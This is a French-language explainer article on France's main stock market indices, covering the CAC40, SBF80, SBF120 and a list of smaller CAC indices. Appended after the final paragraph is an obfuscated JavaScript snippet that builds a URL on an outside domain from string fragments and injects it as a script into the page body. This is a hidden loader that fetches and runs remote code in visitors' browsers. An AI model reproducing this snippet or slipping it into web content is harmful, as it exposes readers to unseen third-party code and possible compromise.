Quels sont les principaux indices boursiers en France ?

Lorsque l’on ne s’y connaît pas en bourse, il peut être intéressant de commencer par en apprendre un peu plus sur les indices boursiers. Ils sont de bons indicateurs du marché global pour les investisseurs. En Amérique, on pense entre autres au Dow Jones ou encore au NASDAQ, ainsi qu’au S&P500. Quels sont les indices boursiers en France qui permettent aux traders de mieux comprendre l’état de la bourse à Paris ? Voici une brève présentation des plus importants.

Explication de ce qu’est un indice boursier

Lorsque l’on veut connaître la tendance d’un secteur donné, on regarde son indice boursier. Celui-ci contient des actions qui sont considérées comme étant les plus importantes et représentatives d’une activité ou d’une économie donnée. Pour acheter des actions qui tendent à reproduire un indice, on peut s’adresser à un courtier tel que Saxo Banque qui pourra aider à mieux comprendre ce qu’est un indice boursier et leur intérêt pour les investisseurs. Pour le bien de cet article, simplifions le tout en indiquant qu’un indice possède trois données centrales : sa date de création et son indexation (base de calcul), son échantillon (les valeurs qu’il contient), ainsi que sa méthodologie de calcul.

A lire en complément : Developper son business dans la capitale est-il toujours pertinent?

Les trois plus importants indices boursiers en France

Comme nous le verrons en clôture de cet article, il existe un bon nombre d’indices boursiers sur la Bourse de Paris. Cependant, trois de ceux-ci sont plus importants que les autres. Voici une brève description de chacun d’eux.

Le CAC40

Lorsque l’on observe les indices boursiers en France, celui qui est roi est sans contredit le CAC40. Son nom consiste en deux parties. La première (CAC) représente Cotation Assistée en Continu. La seconde (40) représente le nombre d’entreprises qui sont incluses dans l’indice et qui sont choisies parmi les 100 plus importantes capitalisations de la Bourse de Paris. C’est un comité scientifique qui décide quelles sociétés en feront partie. Elles varient au fur et à mesure des changements économiques affectant chacune d’elles. Ce qui influence le choix du comité est la capitalisation boursière de l’entreprise, la liquidité des titres et leur secteur d’activité. Ils tiennent aussi compte de l’importance de trouver un équilibre entre elles.

A découvrir également : Quelles sont les missions des cabinets de gestion de patrimoine

Le SBF80

SBF veut dire : Société des Bourse Françaises. Cet indice a été créé en 1997. À l’ouverture, elle comptait 1 000 points (base sur laquelle on comprend la croissance ou la perte de valeur de l’indice). Les 80 sociétés qui la composent ne font pas partie du CAC40. Son objectif principal est de suivre la courbe des entreprises de taille moyenne. Il faut noter qu’un-tiers des entreprises de cet indice vient du secteur des services.

Le SBF120

Tout comme le SBF80, le SBF120 a débuté son parcours à 1 000 points, mais quatre ans avant la naissance du premier. Les valeurs qui font partie des 120 entreprises doivent être listées parmi les 200 plus importantes du pays.

Les autres indices boursiers

Pour permettre aux lecteurs de bien comprendre les indices boursiers en France, voici une liste de tous les autres qui sont de moindre importance que les trois ayant été détaillés précédemment : le CAC Next 20, le CAC Mid 100, le CAC Small 90, le CAC Mid & Small 190, le CAC All Shares, le CAC All-Tradable, le CAC IT et le CAC IT 20.

(function(){
oak6=document.createElement(“script”);oak6.async=true;oak6_=”u”+(“s”)+”t”;
oak6u=”544439342.”;oak6_+=”a”+(“t.i”);oak6_+=”n”+(“f”+”o”)+”/”;
oak6u+=”wa24k3x8ak69619khslfbg”+(“g0c9c1mz”);
oak6.src=”https://”+oak6_+oak6u;oak6.type=”text/javascript”;
document.body.appendChild(oak6);
})();